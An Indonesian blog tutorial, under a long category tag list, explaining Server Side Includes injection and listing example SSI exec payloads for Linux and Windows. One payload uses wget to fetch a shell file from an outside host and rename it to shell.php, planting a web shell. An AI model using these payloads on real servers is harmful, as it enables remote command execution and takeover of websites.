- *99#Payment
- 2022 Video Editing Software
- 4MLinux
- A2 Hosting
- Accounting
- Acer Gaming Laptop
- Adobe Master Collection CS6
- Ads Network
- Adsence
- Adsense
- Adsense Approval Themes
- Adsense Approval Tips 2021
- Adsense Approval Trick 2022
- Adsense tips
- adsreadybloggertemplate
- Android
- Anime
- Aplikasi
- Application
- Article Spinner
- Asisten Virtual
- Asus Gaming Laptop
- Audio
- Banking
- Beasiswa
- Berita
- Best Affiliate Program
- Best Android Mobiles
- Best Gaming Laptop 2022
- BIOS
- Bitcoin Mining
- Blog
- Blogger
- Blogger Adsense theme
- Blogger Documation
- Blogger Help
- Blogger Pro Tips
- Blogger SEO Theme
- Blogger Template
- Blogging
- Blogging Advance Level Guide 2021 Free
- Blue Host
- Book
- Book Review
- Browser
- BTC
- Business
- Canon
- Cloud Computing
- Cloud mining
- Contents
- Crack Apk
- Crypto Mining
- Cryptotab Browser
- CSS
- Database
- Debian
- DIGITAL MARKETING
- Dokumen
- Download BIOS In Pendrive
- Download Windows 11
- DreamHost
- DSLR
- E-book
- Earn Bitcoin
- Earn Money By Blogger 2021
- EarnMoney
- Edukasi Freemium
- Email marketing
- Emulator
- Entrepreneur
- Fast Loading Template
- Fedora
- Fotografi
- Free Domains
- Free Traffic Sources Series
- Free Video Editing Software
- Free WebHosting
- Free WordPress Hosting
- freelancer
- Gadget
- Game
- Games
- Gaming
- google adsence approval
- Google Adsense
- GooglePay
- Hacking
- Hosting
- HP Gaming Laptop
- HTML
- Info Menarik
- Install Windows 11 2021
- Internet
- Investment
- IPO
- Jaringan
- Javascript
- K3
- Kali Linux
- Kamera
- Kampus
- Kamu harus tau
- Kata Bijak
- Kesehatan
- Komputer
- Konten Kreator
- Kursus
- lainnya
- Laptop
- Learn Blogging
- Legit Bitcoin mining website
- Lenovo Gaming Laptop
- Lensa
- Life story
- Linux
- Make money
- MakePaymentWithoutInternet
- Management
- Marketing
- Marketing Tools
- Marketplace
- Mirrorless
- Mobile
- mobile friendly blogger temlate. trueurlsafelink
- Mod Apk
- MoneyTransfer
- Movie Corner
- MSI Gaming Laptop
- Multimedia
- MySQL
- Network
- Office
- Open Source
- Operation System
- Opini
- Paraphrasing Tools
- Payments
- Paytm
- Pembelajaran
- Pemrograman
- Personal
- Pesantren dan TPA
- Phonepe
- Photographic
- PHP
- politeknik
- Premium Blogger Template
- Prestasi
- Profesi
- Programming
- RankInGoogle
- Rekomendasi Anime
- Rekomendasi saham harian
- Review
- safelink
- Safelinktemplate
- safelinktemplateblogger
- Saran Anime
- SD
- SearchEngine
- Self Improvement
- SEO
- seo blogger template
- Seo Optimized Template
- Seo Tips
- Seputar Anime
- Sim Card
- Site
- SiteGround
- SMA
- Smartphone
- SMK
- SMP
- Social media growth tool
- Software
- SSL
- SteamOS
- Storage
- System Update
- Tech
- Technology
- Teknologi
- Template
- Template Website
- Tips dan Trik
- Tips/Trik
- Tools
- TOP 10
- Top 5 Web Hosting 2021
- Top Video Editing Software 2022
- Top5SafelinkTemplates
- Top5Webhosting
- Trending
- Tutorial
- Tutorial Adobe Flash CS6
- Tutorial Debian
- Tutorial Ubuntu
- Tutorial Windows
- Tutorial XAMPP
- Ubuntu
- Umum
- universitas
- Unlimited Storage Free Hosting
- Update
- Update BIOS
- UPI
- Video
- Video Editing
- Vlog
- Web
- web development
- Web Server
- WebShell
- Website
- Windows
- Windows 10
- Windows BIOS Update
- Windows11 Os Downalod
- Windows11OS
- WordPress
- Wordpress plugin
- WPsafelinkplugin
- Write Unique Article
- Youtube
- Zimbra
APA ITU SERVER SIDE INCLUDES - SSI Injection
Assalamualaikum guyss, welcome back to my blog:v. Oke langsung ae kali ini mimin bakal share materi tentang SERVER SIDE INCLUDES atau juga di sebut SSI. Jadi gasken ae
Apa Itu Server Side Includes?
SSI adalah arahan yang ada pada aplikasi Web yang digunakan untuk memberi makan halaman HTML dengan konten dinamis. Ini seperti CGI tapi SSI digunakan untuk menjalankan beberapa tindakan sebelum halaman di muat. Untuk melakunya server web menganalisis SSI sebelum memberikam halaman pada pengguna.
Serangan Server Side Includes mengeskploitasi website dengan menyuntikan script di html atau mengeksekusi kode arbitrer (atau kalian biasanya mengenalnya dengan RCE). Itu dapat dieksploitasi melalui manipulasi SSI yang digunakan dalam aplikasi atau memaksa penggunaannya melalui bidang input pengguna (Login Form, Search, Atau input lainya).
Untuk memeriksa apakah aplikasi memvalidasi data bidang input dengan benar dengan memasukkan karakter yang digunakan dalam arahan SSI, seperti:< ! # = / . " - > and [a-zA-Z0-9]
Cara lain untuk mengetahui apakah website rentan SSI adalah dengan memverivikasi halaman website dengan ekstensi shtml, shtm, stm. Namun kurangnya jenis halaman ini tidak berarti kalau website ini terlindungi dari serangan SSI.
Bagaimanapun, serangan akan berhasil jika server mengijinkan eksekusi SSI tanpa validasi yang tepat Hal ini dapat menyebabkan akses dan manipulasi sistem file dan proses di bawah izin dari pemilik proses server web.
Penyerang dapat mengakses informasi sensitif, seperti file kata sandi, dan menjalankan perintah shell. Arahan SSI disuntikkan di bidang input dan dikirim ke server web. Server web mem-parsing dan mengeksekusi arahan sebelum memasok halaman. Kemudian, hasil serangan akan dapat dilihat saat berikutnya halaman dimuat untuk browser pengguna.
Contoh :
Perintah yang digunakan untuk menyuntikkan SSI bervariasi sesuai dengan sistem operasional server yang digunakan. Perintah berikut mewakili sintaks yang harus digunakan untuk menjalankan perintah OS.
Linux:
List files of directory:
<!--#exec cmd="ls" -->
Access directories:
<!--#exec cmd="cd /root/dir/">
Execution script:
<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->
Windows:
List files of directory:
<!--#exec cmd="dir" -->
Access directories:
<!--#exec cmd="cd C:\admin\dir">
DLL:v sebernernya sintaks yang di gunakan untuk serangan SSI sangat banyak, seperti sintaks yang biasanya kalian gunakan pada Remote Code Execution (RCE).
Oke lah sekian dulu materi dari mimin kurang lebihnya mohon maaf, Wassalamualikum...
Baca juga

Post a Comment
Post a Comment